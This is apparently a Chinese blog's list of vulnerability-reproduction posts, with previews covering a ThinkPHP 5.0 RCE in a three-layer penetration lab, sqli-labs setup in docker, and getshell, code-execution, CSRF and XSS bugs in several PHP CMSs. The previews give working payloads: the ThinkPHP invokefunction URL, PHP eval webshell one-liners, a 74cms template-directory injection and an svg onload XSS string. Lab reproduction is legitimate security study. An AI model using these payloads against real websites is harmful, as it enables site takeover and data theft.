
漏洞复现
kerve
我是kerve希望我的文章可以给大家带来帮助
展开
-
渗透测试——CFS三层靶机渗透
是样一个逻辑nmap信息收集:nmap -T4 -O 192.168.1.107http://192.168.1.107/public/看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞payload:http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&var.原创 2021-01-29 23:52:06 · 2354 阅读 · 2 评论 -
渗透测试——CFS三层靶机渗透搭建手册
搭建手册:1、网络搭建:kali ping同Target1 Target2 ping同Target3Target1Target2Target3默认密码teamssix.com2、宝塔搭建启动命令:/etc/init.d/bt start重启/etc/init.d/bt restart默认端口管理8888忘记密码:恢复默认bt default如果无法访问新建站点到这里环境就搭建好了...原创 2021-01-29 15:04:08 · 1302 阅读 · 0 评论 -
docker搭建sqli-labs以及docker命令使用详解
docker搭建sqli-labs以及docker使用详解docker search sqli-labssearch 搜寻镜像命令 可以理解为安装虚拟机的所需要的镜像docker pull acgpiano/sqli-labs pull 可理解为把这个镜像拔下来我们直接拔可能有点慢先安装docker加速器 cd /etc/docker vim /etc/docker/daemon.json {"registry-mirrors": ["https://9cpn8tt6.mirror.a原创 2021-01-27 15:20:13 · 1255 阅读 · 0 评论 -
GreenCMS_v2.3.0603_index.php_CSRF漏洞
GreenCMS_v2.3.0603_index.php_CSRF漏洞在GreenCMS v2.3.0603中存在CSRF漏洞,它使攻击者可以通过index.php?m=admin&c=media&a=fileconnect的content参数,上传任意文件,导致攻击者获取webshell。1.管理员登录账户,并查看Upload目录,与攻击后做对比:账户密码:admin/admin链接:http://IP/admin.php...原创 2021-01-12 10:59:49 · 528 阅读 · 1 评论 -
GreenCMS_v2.3敏感信息泄露
漏洞名称GreenCMS_v2.3敏感信息泄露漏洞详情GreenCMS,基于ThinkPHP的内容管理系统,插件机制、在线更新内容等等功能俱全。 GreenCMS_v2.3存在信息泄露漏洞。攻击者可以利用此漏洞快速识别服务器重要信息。验证过程打开网站http://192.168.152.128:1025/http://192.168.152.128:1025/Data/Log/20_02_23.log我们来分析一下漏洞出现的原因 猜测可能时web目录权限的问题可以看到时777权限原创 2021-01-11 11:12:38 · 364 阅读 · 0 评论 -
OKLite 1.2.25 后台文件上传getshell
OKLite是一套极简企业站系统,主要目标群体是展示型企业网站用户,让传统小企业快速布署网站,加强自身品牌意识,实现对公司形象的宣传。本系统最初是PHPOK程序精简而来。在同等配置下,OKLite速度优于PHPOK达30%以上。 通过上传任意文件漏洞,可以获得WebShell权限。登录后台 admin admin123把1.php压缩成1.zip<?php @eval($_POST[1]);?>环境在我博客里下载docker...原创 2021-01-08 11:43:27 · 509 阅读 · 0 评论 -
DedeCms5.7后台任意文件上传 getshell
DedeCms5.7后台任意文件上传 getshell上传的木马为 <?php @eval($_POST[1]);?>使用蚁剑连接拿到shell 代码在我博客里关注即可下载原创 2021-01-07 11:11:07 · 767 阅读 · 0 评论 -
74cms代码执行漏洞
74cms-v4.2.1-v4.2.129-后台文件写入导致的代码执行漏洞http://192.168.107.131:1026/upload/index.php?m=admin&c=index&a=indexhttp://192.168.107.131:1026/upload/index.php?m=admin&c=tpl&a=set&tpl_dir=%27,%27a%27,eval($_GET[1]),%27http://192.168.107.13原创 2021-01-03 13:13:36 · 2181 阅读 · 0 评论 -
XYHCMS 3.6 后台代码执行漏洞
XYHCMS 3.6 后台代码执行漏洞<?=phpinfo();?>http://192.168.107.131:1026/App/Runtime/Data/config/site.php经过多次实验终于拿到shell <?php @eval($_POST[5]);?>需要环境的私聊后期会放到站上原创 2020-12-29 14:37:05 · 1418 阅读 · 0 评论 -
XSS-YxCMS 1.4.7漏洞
环境百度下就可以进入网站留言板http://192.168.107.131:1026index.php?r=default/column/index&col=guestbookpayload:<svg/onload=alert(1)>原创 2020-12-28 15:05:41 · 638 阅读 · 0 评论